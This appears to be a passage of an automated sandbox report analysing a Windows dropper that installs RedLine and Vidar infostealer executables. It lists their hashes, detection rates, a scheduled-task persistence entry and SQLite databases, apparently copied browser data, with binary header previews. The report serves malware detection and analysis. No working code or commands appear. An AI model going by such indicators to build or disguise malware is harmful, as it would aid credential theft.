18:26:22	Task Scheduler	Run new task: COMSurrogate path: C:\Users\user\TypeRes\DllResource.exe

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Program Files (x86)\Company\NewProduct\F0geI.exe

Download File

Process:	C:\Users\user\Desktop\9n6ctoq7cn.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	347136
Entropy (8bit):	6.626098895117023
Encrypted:	false
SSDEEP:	6144:Y7v3qLsCqxXXFaNOq7trETZdZjPLUQxIAi/9xlNtQ/3N:Y7vbfQOkrETZdZjPv10RNk
MD5:	501E0F6FA90340E3D7FF26F276CD582E
SHA1:	1BCE4A6153F71719E786F8F612FBFCD23D3E130A
SHA-256:	F07D918C6571F11ABF9AB7268AC6E2ECBCD931C3D9D878895C777D15052AAE2B
SHA-512:	DEE3AABFCA7912F15B628253222CFE8D8E13CD64F0438E8D705B68B0A14B4C9523B7A207583BE7B424E444D6B05F237484A0C38BF2E075D347EF937D409A3A69
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 64%, Browse Antivirus: ReversingLabs, Detection: 96%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)./.H.\|.H.\|.H.\|..+\|.H.\|..(\|.H.\|..>\|.H.\|...\|.H.\|.H.\|.H.\|..9\|.H.\|..)\|.H.\|..,\|.H.\|Rich.H.\|................PE..L.....@a.................r...~.......4............@.........................................................................dq..P................................... ...............................`...@............................................text...xq.......r.................. ..`.data...Hv...........v..............@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Company\NewProduct\brokerius.exe

Download File

Process:	C:\Users\user\Desktop\9n6ctoq7cn.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	290304
Entropy (8bit):	6.579401645714669
Encrypted:	false
SSDEEP:	6144:bsMZN00ag9n0A12I4azih0o3n4+nKyIXszhO3UJcC:tN0ng9nB1+a+nKyPFOkJcC
MD5:	F5D13E361F8B9ACA7103CB46B441034B
SHA1:	090DCC68F4CE59D1C5B8B7424508C4033EE418DD
SHA-256:	A5AD514ED54F1F8F0A8E054B0DC3A39D13D70E388711DDB9D44095A5A89317BF
SHA-512:	DB8F615405C3DCBB2E525903A572E13565F184BC8C1A2674138A84774DD06041A9899006B8599A25F06CE4FBA92C12D102772E74BE62AC6D02B5BC0AC4EE124A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 58%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>.}.m.}.m.}.m..Km.}.m...m.}.m..Vm.}.m..Fm.}.m.}.m.}.m..~m.}.m..Hm.}.mRich.}.m................PE..L...M..c................."...~......]........@....@.......................................@.................................\|...(................................<......................................@............@..L............................text...8!.......".................. ..`.rdata.......@.......&..............@..@.data....Q... ......................@....reloc...L.......N... ..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Company\NewProduct\captain09876.exe

Download File

Process:	C:\Users\user\Desktop\9n6ctoq7cn.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	721408
Entropy (8bit):	4.496128932092844
Encrypted:	false
SSDEEP:	3072:gvGyYiSDnt1k5vWp1icKAArDZz4N9GhbkENEkEMEwnuxm9G01vbLque0Ys8L9dZs:E4Dp0yN90vEvMEwnF1vCuU4QxomgOa
MD5:	CE94CE7DE8279ECF9519B12F124543C3
SHA1:	BE2563E381439ED33869A052391EEC1DDD40FAA0
SHA-256:	F88D6FC5FD36EF3A9C54CF7101728A39A2A2694A0A64F6AF1E1BEFACFBC03F20
SHA-512:	9697CFC31B3344A2929B02ECDF9235756F4641DBB0910E9F6099382916447E2D06E41C153FAD50890823F068AE412FB9A55FD274B3B9C7929F2CA972112CC5B7
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 37%, Browse Antivirus: ReversingLabs, Detection: 38%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......le.Z(...(...(...Mb..)...Mb..*...Mb..:...Mb..9...(.......Mb..!...Mbh.)...Mb..)...Rich(...........................PE..d................."......t...........y.........@.............................`...........`.......... ...................................................Z...................P.. .......T............................................... ............................text...0s.......t.................. ..`.rdata...".......$...x..............@..@.data...............................@....pdata..............................@..@.rsrc....Z.......\..................@..@.reloc.. ....P......................@..B................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Company\NewProduct\jshainx.exe

Download File

Process:	C:\Users\user\Desktop\9n6ctoq7cn.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	109568
Entropy (8bit):	5.74839124004363
Encrypted:	false
SSDEEP:	3072:9cvFBgCYKpi8IVJFKQ6OUxuvQc0ZpDHh64EASNh:9cv+t36jo4c+Hh64jS
MD5:	2647A5BE31A41A39BF2497125018DBCE
SHA1:	A1AC856B9D6556F5BB3370F0342914EB7CBB8840
SHA-256:	84C7458316ADF09943E459B4FB1AA79BD359EC1516E0AD947F44BDC6C0931665
SHA-512:	68F70140AF2AD71A40B6C884627047CDCBC92B4C6F851131E61DC9DB3658BDE99C1A09CAD88C7C922AA5873AB6829CF4100DC12B75F237B2465E22770657AE26
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, Author: ditekSHen Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 46%, Browse Antivirus: ReversingLabs, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... .................0................. ........@.. ....................................@.....................................O...................................d................................................ ............... ..H............text...@.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe

Download File

Process:	C:\Users\user\Desktop\9n6ctoq7cn.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	775168
Entropy (8bit):	6.7110819961841575
Encrypted:	false
SSDEEP:	12288:7RUQ/DK21WSRL3oXY+/zNi7Dha0pePTvJRXYBVMAqn4jNZYXm0ipZZBPA76:77zXL3oXVw700pe7zXYBVgn4jNZYXdik
MD5:	3EC059BD19D6655BA83AE1E644B80510
SHA1:	61FA49D4473E91509B32A3B675A236B1EAB74D08
SHA-256:	7DC81DC72CB4F89AD022BB15419E1B6170CF77942B8EC29839924B7B4FE7896C
SHA-512:	5324C3A902B96D5782E01DD0BFB177055A6908112C60C85AF49C7E863B62F0947D6E18D5AC370652008C5983B0C8BD762AB4444822D0AD547A88883970ADABE9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 44%
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B.................".........../.......@....@..........................P...................@..............................H$.................................................................................................................CODE..... .......".................. ..`DATA.....'...@...(...&..............@...BSS.....9....p.......N...................idata..H$.......&...N..............@....tls.................t...................rdata...............t..............@..P.reloc..............v..............@..P.rsrc..............................@..P.............P......................@..P........................................................................................................................................

C:\Program Files (x86)\Company\NewProduct\me.exe

Download File

Process:	C:\Users\user\Desktop\9n6ctoq7cn.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	289792
Entropy (8bit):	6.577030247429739
Encrypted:	false
SSDEEP:	6144:jRkvX/XFYXXHX/mI4WtK1ecA0nX5lBzeXAl+J:NW9YXXHvO1nX5lBqXq+J
MD5:	21C43007B3C14564CF459791F86DA430
SHA1:	FEFA6F4B954173D72A12B0089A92F270F2716A2A
SHA-256:	62C0FA8AE93F0B4B6EC1CDCA23AC24AC55CED93CB11A06AC104CEC8AA44969AC
SHA-512:	D27B4D92DACE25F3A83388486CC2D04053C8219B50DE1F989A0D55C71B62C124A964DC7FC2CF4FF54DA0A3DE5648A923EB431D57BD72E8C1961585F8C75EBCD5
Malicious:	true
Yara Hits:	Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: C:\Program Files (x86)\Company\NewProduct\me.exe, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 41%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>.}.m.}.m.}.m..Km.}.m...m.}.m..Vm.}.m..Fm.}.m.}.m.}.m..~m.}.m..Hm.}.mRich.}.m................PE..L......c................. ...~...............0....@.......................................@.....................................(............................p..\<......................................@............0..L............................text...[........ .................. ..`.rdata..h....0.......$..............@..@.data....Q..........................@....reloc..hL...p...N..................@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe

Download File

Process:	C:\Users\user\Desktop\9n6ctoq7cn.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	109568
Entropy (8bit):	5.749974684688708
Encrypted:	false
SSDEEP:	3072:NcvFB4CYHpiVIlf0By1C+4IQclHbTTh/4EASNB:NcvGt91Cdxc9Th/4jS
MD5:	BBD8EA73B7626E0CA5B91D355DF39B7F
SHA1:	66E298653BEB7F652EB44922010910CED6242879
SHA-256:	1AA3FDC24E789B01A39944B85C99E4AC08864D2EAE7530164CEA2821ACBF184E
SHA-512:	625CC9C108B4660030BE1282493700E5F0CCFB973F466F61254ED1E1A96F5F042CDEAA94607825A2F694647468E2F525A6451542FE3AAC785EBAC1CCFE39864F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0................. ........@.. ....................................@.................................p...O...................................T................................................ ............... ..H............text...0.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe

Download File

Process:	C:\Users\user\Desktop\9n6ctoq7cn.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1810960
Entropy (8bit):	7.956922547006569
Encrypted:	false
SSDEEP:	49152:SdAhjSod/EhksaOenaSJP0BOE5yM5gPHVtC30:SdAhjSOshksaOQRaL5g9Ak
MD5:	63FD052610279F9EB9F1FEE8E262F2A4
SHA1:	AAC344ED6F54C367BE51EFFBF6E84128EE8C6992
SHA-256:	955C265A378008EFEE8F0D19C2880D1026F32F7CD6325E0AB1A24C833905BBBA
SHA-512:	234BC89538336452938FBE1E6774F5F7CA47C735F871AC3BA54A3EA6B68C48970FC53239EA72D5CA176F3ACC00932E479020C38CAD66A0F70A3ACDA5B5AFF9B9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 45%, Browse Antivirus: ReversingLabs, Detection: 42%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........\.u.\.u.\.u.3...T.u.3.....u.U...Y.u.\.t..u.3...S.u.3...].u.\...Z.u.3...].u.Rich\.u.........................PE..L...\|..X............................`R............@.................................u.......................................d...<.......(............................................................*..@...............8............................text............................... ..`.data....;..........................@....rsrc...(...........................@..@........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Company\NewProduct\real.exe

Download File

Process:	C:\Users\user\Desktop\9n6ctoq7cn.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	290304
Entropy (8bit):	6.577888222739814
Encrypted:	false
SSDEEP:	6144:78D5s4D87i0uI4tRiem9ImbTe/iQnj6AlzYjj0Ju:eJD87i0Wzm9IOQnj6Al0jIJ
MD5:	E0C8728412F5F7E97698C72DA925C5E6
SHA1:	1384D6CA09869D8CDDEC443936D75FB5E937F920
SHA-256:	DAFCE710DB720216E5CCCE685848AAA84B27BBAF6DE356E73F09A125CFD0A618
SHA-512:	A3BB5E22C564F64ADAD117EB76ECC3F415F56BE6F26D3F68ECEE8740B750FEC8395D39581E41DD68A4BB263763C9686F1E7E44D46B83B3C09FDCF05BC8716BB3
Malicious:	true
Yara Hits:	Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: C:\Program Files (x86)\Company\NewProduct\real.exe, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>.}.m.}.m.}.m..Km.}.m...m.}.m..Vm.}.m..Fm.}.m.}.m.}.m..~m.}.m..Hm.}.mRich.}.m................PE..L......c................."...~...............@....@.......................................@.................................\|...(................................<......................................@............@..L............................text.... .......".................. ..`.rdata.......@.......&..............@..@.data....Q... ......................@....reloc...L.......N... ..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Company\NewProduct\safert44.exe

Download File

Process:	C:\Users\user\Desktop\9n6ctoq7cn.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	251904
Entropy (8bit):	5.913622549255359
Encrypted:	false
SSDEEP:	6144:i35DsWXcPE0JmESvS85n/f+jEaZfdSsbArGx/KjObJguq:f3KvF5n/f+jEaZfdSsbArGx/KjObJgv
MD5:	414FFD7094C0F50662FFA508CA43B7D0
SHA1:	6EC67BD53DA2FF3D5538A3AFCC6797AF1E5A53FB
SHA-256:	D3FB9C24B34C113992C5C658F6A11F9620DA2E49D12D1ACABE871E1BEA7846EE
SHA-512:	C6527077B4822C062E32C39BE06E285916B501A358991D120A469F5DA1E13D282685CA7CA3FA938292D5BEEF073FBEA42FF9BA96FA5C395F057F7C964608A399
Malicious:	true
Yara Hits:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe, Author: ditekSHen Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 80%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n.................0.................. ........@.. .......................@............@.................................d...W............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H...........N......:....................................................m..3>.r...f.gY.D"...E.2V~...x...h.\.{.yO8...z'...[^....}..T.w...T.:.Z.<...>j(.....8:PH4....\|.r)V6I.C{m.........I.\|..s..`.".#../..'.@Z.<..$.....bb..Y%k....`&....N.Q....-.S.Mv#gS.e. .c...U......}.......+.......S....h...C..\..;.eD.0......m...?..b.r..0E.q>.f4!./X........o..F.k.tj..B.i.Rv.....@...-L.u...R.-.K_/w.VP..EMd.j1....=......t.R....&.1m.#:.n.j...'..\|...H...NB.D.F..s..sU.6._o.

C:\ProgramData\19528735314878835070619209

Download File

Process:	C:\Program Files (x86)\Company\NewProduct\real.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2882898331044472
Encrypted:	false
SSDEEP:	192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
MD5:	4822E6A71C88A4AB8A27F90192B5A3B3
SHA1:	CC07E541426BFF64981CE6DE7D879306C716B6B9
SHA-256:	A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
SHA-512:	C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\21240448146902301651114502

Download File

Process:	C:\Program Files (x86)\Company\NewProduct\real.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	1.784391713287988
Encrypted:	false
SSDEEP:	96:YeGpb25xp8k33Y0Rwhba5DX7+tcJ0AYcbMTU7MiGTp9K:YRpaxyk3BRwE5H+t1/TTU7MiGTp9
MD5:	183D634C2B142BCAF0FABF20354396D3
SHA1:	88D40D3DFAC221ACA4BAF91C3C1BAEFD0AE283DD
SHA-256:	6E7148B5B4FAF60578AA29B8457E48DB501777B8126790D68419A02B4FDDC7DD
SHA-512:	9DD12168853211671A105D4FED48B86120905A6A13256D03AE0BA4F8D0F67DD5371466BEBCF3C7C7EBCF0D568108D708DB8FF540E69FFEFC40DCA4EBBEA332AD
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\52981019742633212040970962

Download File

Process:	C:\Program Files (x86)\Company\NewProduct\real.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005
Category:	dropped
Size (bytes):	147456
Entropy (8bit):	0.8091507101768807
Encrypted:	false
SSDEEP:	384:LRab+d5neFTx+uRpHDiEwABBE3uVab+QuJdn:LRab+dVeFLiEZBBjVab+QuJdn
MD5:	42B7D3AFF914DC4074BDC761D3BE60CC
SHA1:	2BCA95884D20FC0952CB3E63D5E5607D1CA21161
SHA-256:	B627B807D334570E9B83746E97D90231A4FFF0337FE73EE63AEC068AB894199B
SHA-512:	DEB2685D33726D76A4CFC45F5D6B16BD8B938BE726F146F457D96BF7B7096D9BF0FF2E2936C0DD5990DCDFACF4B50350B02BB1250051B395954C17ED02028031
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......$...........)......................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\53402089166484763865605999

Download File

Process:	C:\Program Files (x86)\Company\NewProduct\brokerius.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.7876734657715041
Encrypted:	false
SSDEEP:	48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
MD5:	CF7758A2FF4A94A5D589DEBAED38F82E
SHA1:	D3380E70D0CAEB9AD78D14DD970EA480E08232B8
SHA-256:	6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
SHA-512:	1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\54093211270381163633249876

Download File

Process:	C:\Program Files (x86)\Company\NewProduct\brokerius.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005
Category:	dropped
Size (bytes):	147456
Entropy (8bit):	0.8091507101768807
Encrypted:	false
SSDEEP:	384:LRab+d5neFTx+uRpHDiEwABBE3uVab+QuJdn:LRab+dVeFLiEZBBjVab+QuJdn
MD5:	42B7D3AFF914DC4074BDC761D3BE60CC
SHA1:	2BCA95884D20FC0952CB3E63D5E5607D1CA21161
SHA-256:	B627B807D334570E9B83746E97D90231A4FFF0337FE73EE63AEC068AB894199B
SHA-512:	DEB2685D33726D76A4CFC45F5D6B16BD8B938BE726F146F457D96BF7B7096D9BF0FF2E2936C0DD5990DCDFACF4B50350B02BB1250051B395954C17ED02028031
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......$...........)......................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\57970335775376263468477862

Download File

Process:	C:\Program Files (x86)\Company\NewProduct\brokerius.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	1.784391713287988
Encrypted:	false
SSDEEP:	96:YeGpb25xp8k33Y0Rwhba5DX7+tcJ0AYcbMTU7MiGTp9K:YRpaxyk3BRwE5H+t1/TTU7MiGTp9
MD5:	183D634C2B142BCAF0FABF20354396D3
SHA1:	88D40D3DFAC221ACA4BAF91C3C1BAEFD0AE283DD
SHA-256:	6E7148B5B4FAF60578AA29B8457E48DB501777B8126790D68419A02B4FDDC7DD
SHA-512:	9DD12168853211671A105D4FED48B86120905A6A13256D03AE0BA4F8D0F67DD5371466BEBCF3C7C7EBCF0D568108D708DB8FF540E69FFEFC40DCA4EBBEA332AD
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\60907703788550006390977210

Download File

Process:	C:\Program Files (x86)\Company\NewProduct\real.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.7876734657715041
Encrypted:	false
SSDEEP:	48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
MD5:	CF7758A2FF4A94A5D589DEBAED38F82E
SHA1:	D3380E70D0CAEB9AD78D14DD970EA480E08232B8
SHA-256:	6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
SHA-512:	1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\69680865568371516847682832

Download File

Process:	C:\Program Files (x86)\Company\NewProduct\real.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005
Category:	dropped
Size (bytes):	147456
Entropy (8bit):	0.8091507101768807
Encrypted:	false
SSDEEP:	384:LRab+d5neFTx+uRpHDiEwABBE3uVab+QuJdn:LRab+dVeFLiEZBBjVab+QuJdn
MD5:	42B7D3AFF914DC4074BDC761D3BE60CC
SHA1:	2BCA95884D20FC0952CB3E63D5E5607D1CA21161
SHA-256:	B627B807D334570E9B83746E97D90231A4FFF0337FE73EE63AEC068AB894199B
SHA-512:	DEB2685D33726D76A4CFC45F5D6B16BD8B938BE726F146F457D96BF7B7096D9BF0FF2E2936C0DD5990DCDFACF4B50350B02BB1250051B395954C17ED02028031
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......$...........)......................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\71086284743603240237924109

Download File

Process:	C:\Program Files (x86)\Company\NewProduct\brokerius.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2882898331044472
Encrypted:	false
SSDEEP:	192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
MD5:	4822E6A71C88A4AB8A27F90192B5A3B3
SHA1:	CC07E541426BFF64981CE6DE7D879306C716B6B9
SHA-256:	A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
SHA-512:	C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\72901861047999873527313824

Download File

Process:	C:\Program Files (x86)\Company\NewProduct\brokerius.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2882898331044472
Encrypted:	false
SSDEEP:	192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
MD5:	4822E6A71C88A4AB8A27F90192B5A3B3
SHA1:	CC07E541426BFF64981CE6DE7D879306C716B6B9
SHA-256:	A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
SHA-512:	C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\84260042306243613656626784

Download File

Process:	C:\Program Files (x86)\Company\NewProduct\real.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2882898331044472
Encrypted:	false
SSDEEP:	192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
MD5:	4822E6A71C88A4AB8A27F90192B5A3B3
SHA1:	CC07E541426BFF64981CE6DE7D879306C716B6B9
SHA-256:	A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
SHA-512:	C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\85083570365789010799464184

Download File

Process:	C:\Program Files (x86)\Company\NewProduct\brokerius.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005
Category:	dropped
Size (bytes):	147456
Entropy (8bit):	0.8091507101768807
Encrypted:	false
SSDEEP:	384:LRab+d5neFTx+uRpHDiEwABBE3uVab+QuJdn:LRab+dVeFLiEZBBjVab+QuJdn
MD5:	42B7D3AFF914DC4074BDC761D3BE60CC
SHA1:	2BCA95884D20FC0952CB3E63D5E5607D1CA21161
SHA-256:	B627B807D334570E9B83746E97D90231A4FFF0337FE73EE63AEC068AB894199B
SHA-512:	DEB2685D33726D76A4CFC45F5D6B16BD8B938BE726F146F457D96BF7B7096D9BF0FF2E2936C0DD5990DCDFACF4B50350B02BB1250051B395954C17ED02028031
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......$...........)......................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\OnMdcCh3fDlx

Download File

Process:	C:\Program Files (x86)\Company\NewProduct\F0geI.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	1.784391713287988
Encrypted:	false
SSDEEP:	96:YeGpb25xp8k33Y0Rwhba5DX7+tcJ0AYcbMTU7MiGTp9K:YRpaxyk3BRwE5H+t1/TTU7MiGTp9
MD5:	183D634C2B142BCAF0FABF20354396D3
SHA1:	88D40D3DFAC221ACA4BAF91C3C1BAEFD0AE283DD
SHA-256:	6E7148B5B4FAF60578AA29B8457E48DB501777B8126790D68419A02B4FDDC7DD
SHA-512:	9DD12168853211671A105D4FED48B86120905A6A13256D03AE0BA4F8D0F67DD5371466BEBCF3C7C7EBCF0D568108D708DB8FF540E69FFEFC40DCA4EBBEA332AD
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\a9zuq5Btt219

Download File

Process:	C:\Program Files (x86)\Company\NewProduct\F0geI.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005
Category:	dropped
